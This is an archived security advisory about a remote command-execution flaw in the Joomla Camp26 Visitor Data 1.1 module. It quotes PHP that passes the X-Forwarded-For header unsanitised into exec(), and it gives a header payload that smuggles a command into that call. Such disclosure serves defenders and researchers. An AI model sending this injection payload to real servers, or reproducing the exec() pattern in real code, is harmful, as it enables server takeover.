exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Camp26 Visitor Data 1.1 Code Execution

Joomla Camp26 Visitor Data 1.1 Code Execution
Posted May 12, 2010
Authored by Chip D3 Bi0s

The Joomla Camp26 Visitor Data component version 1.1 suffers from a code execution vulnerability.

tags | exploit, code execution
SHA-256 | cb6dd0035c6093bdb03ba25096a7c831523ed95fb926a179af5d51870ec3ca45

Joomla Camp26 Visitor Data 1.1 Code Execution

Change Mirror Download


Joomla Module Camp26 Visitor Data 1.1 Remote code Execution
============================================================

- Discovered by : Chip D3 Bi0s
- Email : chipdebios@gmail.com
- Date : 2010-04-28
- Severity : 9/10 (CVSS scored)

-------------------------------

Module Camp26 Visitor Data For Joomla 1.5.x
Version : 1.1
Type : Non-Commercial
Created by : Denny Setiarika Pirhadi - camp26.biz Team
License : GPLv2.0 - http://www.gnu.org/licenses/gpl-2.0.html
Created on : 02 May 2008
Latest Update : 26 December 2008
URL : www.camp26.biz

I. BACKGROUND
Visitor Data Module shows the visitor's data on your live site (Their IP, Proxy(if used),
Country, ISP, Browser, Operating System).
Based on GeoIP (www.maxmind.com).

II. DESCRIPTION
Some technical issues were originally published in the following post:
http://elotrolad0.blogspot.com/2010/05/modvisitordata-joomla-remoce-code.html

with whom originally exploit the error, as r0i like to thank, who Realizing the
proof of concept.


III. ANALYSIS
The bug is in the following files, specifying the lines

file:
/modules/mod_VisitorData/tmpl/default.php

line:
[47] if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
[48] $whois ="whois " . $_SERVER['HTTP_X_FORWARDED_FOR'] ." | grep netname";
[49] }
[50] else{
[51] $whois ="whois " . $_SERVER['REMOTE_ADDR'] ." | grep netname";
[52] }
[53]
[54] $isp_user = exec($whois);


explaining the code: what to do is get our ip, and if it passes through any proxy other
than q are also other issues in the code as the country of connection, image, browser,
operating system. As can be seen to see if it goes through a proxy using the exec (),
line 54, reason that allows you to run remote commands.
If the conditional check whether to park in the header HTTP_X_FORWARDED_FOR,if this
happens take this value otherwise take REMOTE_ADDR, 2 may be present at one time.

command to run only can we add X-Forwarded-For in the header to take this value and
run exec () which is what we are interested.

IV. EXPLOITATION
You have to add
X-Forwarded-For:;[command-here];1


+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
















Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close